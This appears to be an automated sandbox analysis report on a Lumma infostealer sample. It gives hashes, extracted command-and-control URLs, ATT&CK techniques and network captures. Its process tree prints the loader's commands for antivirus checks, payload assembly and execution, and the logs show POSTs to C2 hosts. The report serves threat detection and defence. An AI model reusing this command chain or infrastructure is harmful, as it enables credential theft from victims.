lumma | 0fda11e70fd15b6001a6a30fc652ed7cbd2384167ca2ea8af0c54f7cae7e1830

Analysis

max time kernel
146s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11/01/2025, 09:28 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe
Size

24.2MB
MD5

d8bdb08dfec797bab9512006bed4a3b2
SHA1

49d0413c51a3dba9cf863e2978ee00d61dd4789e
SHA256

0fda11e70fd15b6001a6a30fc652ed7cbd2384167ca2ea8af0c54f7cae7e1830
SHA512

8cca5cc6c7119f81ea9a095c13babc4f72af28d30f772d564121aa06a29361a07455d3306d73ce0cdfd2c3a478fc1fee1f9a716d5cfccad5de4108c4c79e9245
SSDEEP

196608:rfHADSSTHO9y7FPhCivssjy9bhCeDXqmH5a9y8yvmMhp43lD2akyGwS+7d:rY5rO9y7phJ8lhCeGry8yvmMhp43lK4

Score

10^/10

lumma discovery stealer

Malware Config

Extracted

Family

lumma

https://truculengisau.biz/api

https://spookycappy.biz/api

https://punishzement.biz/api

https://nuttyshop/api

https://nuttyshopr.biz/api

https://marketlumpe.biz/api

https://littlenotii.biz/api

https://grandiouseziu.biz/api

https://fraggielek.biz/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe

Executes dropped EXE 1 IoCs

pid	Process
3924	Favour.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
628	tasklist.exe
3592	tasklist.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\DlToronto	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe
File opened for modification	C:\Windows\ContinueWitness	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe
File opened for modification	C:\Windows\PassCnet	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe
File opened for modification	C:\Windows\PeninsulaMaster	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Favour.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3924	Favour.com
3924	Favour.com
3924	Favour.com
3924	Favour.com
3924	Favour.com
3924	Favour.com

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	628	tasklist.exe
Token: SeDebugPrivilege	3592	tasklist.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3924	Favour.com
3924	Favour.com
3924	Favour.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3924	Favour.com
3924	Favour.com
3924	Favour.com

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 456 wrote to memory of 2136	456	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe	82
PID 456 wrote to memory of 2136	456	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe	82
PID 456 wrote to memory of 2136	456	2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe	82
PID 2136 wrote to memory of 628	2136	cmd.exe	84
PID 2136 wrote to memory of 628	2136	cmd.exe	84
PID 2136 wrote to memory of 628	2136	cmd.exe	84
PID 2136 wrote to memory of 2360	2136	cmd.exe	85
PID 2136 wrote to memory of 2360	2136	cmd.exe	85
PID 2136 wrote to memory of 2360	2136	cmd.exe	85
PID 2136 wrote to memory of 3592	2136	cmd.exe	87
PID 2136 wrote to memory of 3592	2136	cmd.exe	87
PID 2136 wrote to memory of 3592	2136	cmd.exe	87
PID 2136 wrote to memory of 1796	2136	cmd.exe	88
PID 2136 wrote to memory of 1796	2136	cmd.exe	88
PID 2136 wrote to memory of 1796	2136	cmd.exe	88
PID 2136 wrote to memory of 5072	2136	cmd.exe	89
PID 2136 wrote to memory of 5072	2136	cmd.exe	89
PID 2136 wrote to memory of 5072	2136	cmd.exe	89
PID 2136 wrote to memory of 4000	2136	cmd.exe	90
PID 2136 wrote to memory of 4000	2136	cmd.exe	90
PID 2136 wrote to memory of 4000	2136	cmd.exe	90
PID 2136 wrote to memory of 2012	2136	cmd.exe	91
PID 2136 wrote to memory of 2012	2136	cmd.exe	91
PID 2136 wrote to memory of 2012	2136	cmd.exe	91
PID 2136 wrote to memory of 3944	2136	cmd.exe	92
PID 2136 wrote to memory of 3944	2136	cmd.exe	92
PID 2136 wrote to memory of 3944	2136	cmd.exe	92
PID 2136 wrote to memory of 5100	2136	cmd.exe	93
PID 2136 wrote to memory of 5100	2136	cmd.exe	93
PID 2136 wrote to memory of 5100	2136	cmd.exe	93
PID 2136 wrote to memory of 3924	2136	cmd.exe	94
PID 2136 wrote to memory of 3924	2136	cmd.exe	94
PID 2136 wrote to memory of 3924	2136	cmd.exe	94
PID 2136 wrote to memory of 5108	2136	cmd.exe	95
PID 2136 wrote to memory of 5108	2136	cmd.exe	95
PID 2136 wrote to memory of 5108	2136	cmd.exe	95

C:\Users\Admin\AppData\Local\Temp\2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-11_d8bdb08dfec797bab9512006bed4a3b2_avoslocker_luca-stealer.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:456
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c move Label Label.cmd & Label.cmd
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:628
- - C:\Windows\SysWOW64\findstr.exe
    findstr /I "opssvc wrsa"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2360
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3592
- - C:\Windows\SysWOW64\findstr.exe
    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c md 606448
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5072
- - C:\Windows\SysWOW64\extrac32.exe
    extrac32 /Y /E Newsletters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4000
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V "annotation" Workstation
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b 606448\Favour.com + Vegetarian + Queue + Qualification + Lessons + Wanna + Apr + Connections + Do + Auctions + Excuse 606448\Favour.com
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b ..\Marco + ..\Green + ..\Common + ..\Beverly + ..\Changed + ..\Bacterial + ..\Wins s
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5100
- - C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\606448\Favour.com
    Favour.com s
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3924
- - C:\Windows\SysWOW64\choice.exe
    choice /d y /t 5
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5108

Network

DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

85.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

85.49.80.91.in-addr.arpa

IN PTR

Response
DNS

85.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

85.49.80.91.in-addr.arpa

IN PTR
DNS

14.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.160.190.20.in-addr.arpa

IN PTR

Response
DNS

14.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.160.190.20.in-addr.arpa

IN PTR
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

OksDUNwjnbwbzGlM.OksDUNwjnbwbzGlM

Favour.com

Remote address:

8.8.8.8:53

Request

OksDUNwjnbwbzGlM.OksDUNwjnbwbzGlM

IN A

Response
DNS

adjoininstiff.click

Favour.com

Remote address:

8.8.8.8:53

Request

adjoininstiff.click

IN A

Response

adjoininstiff.click

IN A

104.21.40.173

adjoininstiff.click

IN A

172.67.155.24
POST

https://adjoininstiff.click/api

Favour.com

Remote address:

104.21.40.173:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: adjoininstiff.click

Response

HTTP/1.1 200 OK

Date: Sat, 11 Jan 2025 09:29:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ddp19grjahb0vum65hp4nuvo99; expires=Wed, 07 May 2025 03:16:10 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O128gXaf2rFEf1VOSRP4CtK635R44wjshFYJqiOXC1WzgzAjO%2B6C0lhegjJGc2yCUwqpGcQkj4zczbPLMNRmRKF%2BEHOKnA9hl8yluLJhOb2P8%2B%2BHA2yeLJ6RcGudxuwDzOCEWs2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9003e202799a4133-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=38268&min_rtt=27695&rtt_var=16185&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3309&recv_bytes=611&delivery_rate=128463&cwnd=250&unsent_bytes=0&cid=c924ec23f0a1fe19&ts=291&x=0"
DNS

fraggielek.biz

Favour.com

Remote address:

8.8.8.8:53

Request

fraggielek.biz

IN A

Response
DNS

grandiouseziu.biz

Favour.com

Remote address:

8.8.8.8:53

Request

grandiouseziu.biz

IN A

Response
DNS

littlenotii.biz

Favour.com

Remote address:

8.8.8.8:53

Request

littlenotii.biz

IN A

Response
DNS

marketlumpe.biz

Favour.com

Remote address:

8.8.8.8:53

Request

marketlumpe.biz

IN A

Response
DNS

nuttyshopr.biz

Favour.com

Remote address:

8.8.8.8:53

Request

nuttyshopr.biz

IN A

Response
DNS

punishzement.biz

Favour.com

Remote address:

8.8.8.8:53

Request

punishzement.biz

IN A

Response
DNS

punishzement.biz

Favour.com

Remote address:

8.8.8.8:53

Request

punishzement.biz

IN A
DNS

173.40.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

173.40.21.104.in-addr.arpa

IN PTR

Response
DNS

spookycappy.biz

Favour.com

Remote address:

8.8.8.8:53

Request

spookycappy.biz

IN A

Response
DNS

truculengisau.biz

Favour.com

Remote address:

8.8.8.8:53

Request

truculengisau.biz

IN A

Response
DNS

steamcommunity.com

Favour.com

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
GET

https://steamcommunity.com/profiles/76561199724331900

Favour.com

Remote address:

23.214.143.155:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 11 Jan 2025 09:29:33 GMT
Content-Length: 35593
Connection: keep-alive
Set-Cookie: sessionid=e9545595c0360b33819271e9; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
DNS

sputnik-1985.com

Favour.com

Remote address:

8.8.8.8:53

Request

sputnik-1985.com

IN A

Response

sputnik-1985.com

IN A

104.21.96.1

sputnik-1985.com

IN A

104.21.32.1

sputnik-1985.com

IN A

104.21.48.1

sputnik-1985.com

IN A

104.21.16.1

sputnik-1985.com

IN A

104.21.112.1

sputnik-1985.com

IN A

104.21.64.1

sputnik-1985.com

IN A

104.21.80.1
POST

https://sputnik-1985.com/api

Favour.com

Remote address:

104.21.96.1:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sputnik-1985.com

Response

HTTP/1.1 200 OK

Date: Sat, 11 Jan 2025 09:29:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=vt6q102k75mo76eqa59i9m9a2n; expires=Wed, 07 May 2025 03:16:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eB7ZnJ8TMvj8L41bbmKm3H8xh0uNAM5sAzf0pZyUkoIULKQdimz75y45Oh0LKRRqFkqLMBAF8bIURrLQjF8jY2YvmqLhZqAM7xU6GHqQVn9A2FbP%2Fa0xv1Kt%2B4hAh4QC8XsF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9003e2147e446364-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=26324&min_rtt=26124&rtt_var=10196&sent=8&recv=8&lost=0&retrans=2&sent_bytes=3878&recv_bytes=605&delivery_rate=10383&cwnd=233&unsent_bytes=0&cid=a9982e7d1f77cdea&ts=717&x=0"
DNS

155.143.214.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.143.214.23.in-addr.arpa

IN PTR

Response

155.143.214.23.in-addr.arpa

IN PTR

a23-214-143-155deploystaticakamaitechnologiescom
DNS

1.96.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.96.21.104.in-addr.arpa

IN PTR

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

56.163.245.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.163.245.4.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

88.238.56.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.238.56.23.in-addr.arpa

IN PTR

Response

88.238.56.23.in-addr.arpa

IN PTR

a23-56-238-88deploystaticakamaitechnologiescom
DNS

181.129.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

181.129.81.91.in-addr.arpa

IN PTR

Response
DNS

20.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.49.80.91.in-addr.arpa

IN PTR

Response
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

104.21.40.173:443

https://adjoininstiff.click/api

tls, http

Favour.com

1.0kB
4.9kB
9
9

HTTP Request

POST https://adjoininstiff.click/api

HTTP Response

200
23.214.143.155:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

Favour.com

2.0kB
43.1kB
27
36

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
104.21.96.1:443

https://sputnik-1985.com/api

tls, http

Favour.com

1.6kB
5.5kB
13
11

HTTP Request

POST https://sputnik-1985.com/api

HTTP Response

200

8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

85.49.80.91.in-addr.arpa

dns

140 B
145 B
2
1

DNS Request

85.49.80.91.in-addr.arpa

DNS Request

85.49.80.91.in-addr.arpa
8.8.8.8:53

14.160.190.20.in-addr.arpa

dns

144 B
158 B
2
1

DNS Request

14.160.190.20.in-addr.arpa

DNS Request

14.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

OksDUNwjnbwbzGlM.OksDUNwjnbwbzGlM

dns

Favour.com

79 B
154 B
1
1

DNS Request

OksDUNwjnbwbzGlM.OksDUNwjnbwbzGlM
8.8.8.8:53

adjoininstiff.click

dns

Favour.com

65 B
97 B
1
1

DNS Request

adjoininstiff.click

DNS Response

104.21.40.173

172.67.155.24
8.8.8.8:53

fraggielek.biz

dns

Favour.com

60 B
122 B
1
1

DNS Request

fraggielek.biz
8.8.8.8:53

grandiouseziu.biz

dns

Favour.com

63 B
125 B
1
1

DNS Request

grandiouseziu.biz
8.8.8.8:53

littlenotii.biz

dns

Favour.com

61 B
123 B
1
1

DNS Request

littlenotii.biz
8.8.8.8:53

marketlumpe.biz

dns

Favour.com

61 B
123 B
1
1

DNS Request

marketlumpe.biz
8.8.8.8:53

nuttyshopr.biz

dns

Favour.com

60 B
122 B
1
1

DNS Request

nuttyshopr.biz
8.8.8.8:53

punishzement.biz

dns

Favour.com

124 B
124 B
2
1

DNS Request

punishzement.biz

DNS Request

punishzement.biz
8.8.8.8:53

173.40.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

173.40.21.104.in-addr.arpa
8.8.8.8:53

spookycappy.biz

dns

Favour.com

61 B
123 B
1
1

DNS Request

spookycappy.biz
8.8.8.8:53

truculengisau.biz

dns

Favour.com

63 B
125 B
1
1

DNS Request

truculengisau.biz
8.8.8.8:53

steamcommunity.com

dns

Favour.com

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.214.143.155
8.8.8.8:53

sputnik-1985.com

dns

Favour.com

62 B
174 B
1
1

DNS Request

sputnik-1985.com

DNS Response

104.21.96.1

104.21.32.1

104.21.48.1

104.21.16.1

104.21.112.1

104.21.64.1

104.21.80.1
8.8.8.8:53

155.143.214.23.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

155.143.214.23.in-addr.arpa
8.8.8.8:53

1.96.21.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

1.96.21.104.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

56.163.245.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

56.163.245.4.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

88.238.56.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

88.238.56.23.in-addr.arpa
8.8.8.8:53

181.129.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

181.129.81.91.in-addr.arpa
8.8.8.8:53

20.49.80.91.in-addr.arpa

dns

70 B
145 B
1
1

DNS Request

20.49.80.91.in-addr.arpa
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

144 B
158 B
2
1

DNS Request

19.229.111.52.in-addr.arpa

DNS Request

19.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\606448\Favour.com

Filesize
2KB

MD5
fff7f01d5e3c47c0190d71dfc592c78e

SHA1
de7c7227b0282f79ba691aab590bf20adbb34cca

SHA256
20191cc2504727739b47f723d4316d40f889437adf5e96fa735ea057b88c414c

SHA512
02fc03a9282b998a3f283bff4affe6654f02365149224936106f532b8e1363da42b06314f002d75e2e05b6958322d61b087d55925bbec1f7be5c990318780e54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\606448\Favour.com

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\606448\s

Filesize
482KB

MD5
c38eb4bccce4ab0abe48780e4c9b055f

SHA1
b72ed6d10bd2382217796f21794872f29f583fb0

SHA256
c499414f5730b2752e3914219f5ae242895ed9f26b54421a9d8c9c600a4aef89

SHA512
5d36214dc819c18cd35aad40a0db9fa0e6008e08ea359c5a285af796bed21ac98f037bc6e1d06410959914c1381153b22e52de962a817cbe7fea47f8a26735e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Apr

Filesize
141KB

MD5
55b4d9d9e4fd3c187dc363962a6641f7

SHA1
3eaa97240871d48f85c1f497ac93d1f3a358e5b3

SHA256
53168df582e3f767877370806c224c7230cbf7904d3124c7be44f7ed4a3c5dde

SHA512
a9db81de7d9c8fd994b839e0d013484bb7f48a40567dc5793b3980afe099ca9bdd18588a1efb55368fef772478c960651f4de235a2df5cb6f50a7792462f30d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Auctions

Filesize
76KB

MD5
caa6674dd8a3c205b74797c8ec69e37b

SHA1
e2bd4d8614fdf4b8519268cc9295630135d2a517

SHA256
29d9567417607234d7ffd031e650a8ce158ea37411c0ca4d9f8f90a82cc783a8

SHA512
c277412d44d330c22d4aa6bedecd88de871998970c1a4c64b086170112d524d519391db17afa729343f181d838b2dbfef307f5d7c388cd39f6be007191ea2ab5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Bacterial

Filesize
77KB

MD5
ad5797fb2bf3fa8f491ba46b12ffc8d2

SHA1
e02eee233f659d66350ce5884dc80c3da0a232e9

SHA256
5d44b1797e1f1857ee9d75f4377d86035903dfc45385df53a7246c70c0a7d640

SHA512
c793f8a4babe42e85bdf30909f915f022453b3998ef64284a336bb88fa899f93898e1661acb0a41b67045b369cc83c5fe1a0c275b0384cf4156cdf50dbdf02e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Beverly

Filesize
82KB

MD5
f539140515243cbf7d3036dbf64bf7f3

SHA1
07336d421214448c006078fa5dc79c91888dd8e0

SHA256
72f72038d438514da3c89363962e5ddfb656463b52d95227b4cf7841ec732e30

SHA512
99013ef44800b67095c273f41648aca1236d08427f3ca2206f786a518aa7d4021c07ddcce39cb4fe12e69385f76fb5d1871d2b90d9a1dc25ef92e295b2ff37e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Changed

Filesize
69KB

MD5
7e6c5c04a6b8ba54dbba65d5c5a4641c

SHA1
3f7642398923f05d9fcaec960566869b37da02ca

SHA256
7daf64c082bcb836df336ae71946ddde34310bd69f9786dfc0652db063cd48df

SHA512
86dcf436517d7e8aa17c538702e97476465808ebc373a6d62d9e1d86d56108cc0b71b23a237a214a1a2a52bf546ae0c646dd4a15b77b8ba36d2ba34681094e68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Common

Filesize
69KB

MD5
932c3600a491bec7d872d2dc8c33fb49

SHA1
482084c5d2ca8b0d7e77da96b4beae8e87a2f729

SHA256
77af328c2e7534c878d7da0339999ea11d010e1d75bcebc9d0181826ea9396d9

SHA512
d30212cf9663c6d860e9ba26444abbbe91b5fcb661eb136d7131436f2f6c448fe5abcedcf8b15f5ad9a1024788553175e099e5420247d0e8bfeab02aa9110213

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Connections

Filesize
87KB

MD5
8da2f6ab233a89dc2803749634b54fec

SHA1
873be4048ed83d5f3618637e784383d98871c71e

SHA256
33aca53446ab82abb69ca598712375eb3f770f66cd467bba5ba222f32f4f24c2

SHA512
a203168fc2fb66d542e0a11e6b96543da287cb29a162abf2bf0d0e06358df32daa257b2564aacec2769f8e1b669783aa29e22b92f99b1c5c9cb2ac44e6112931

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Do

Filesize
61KB

MD5
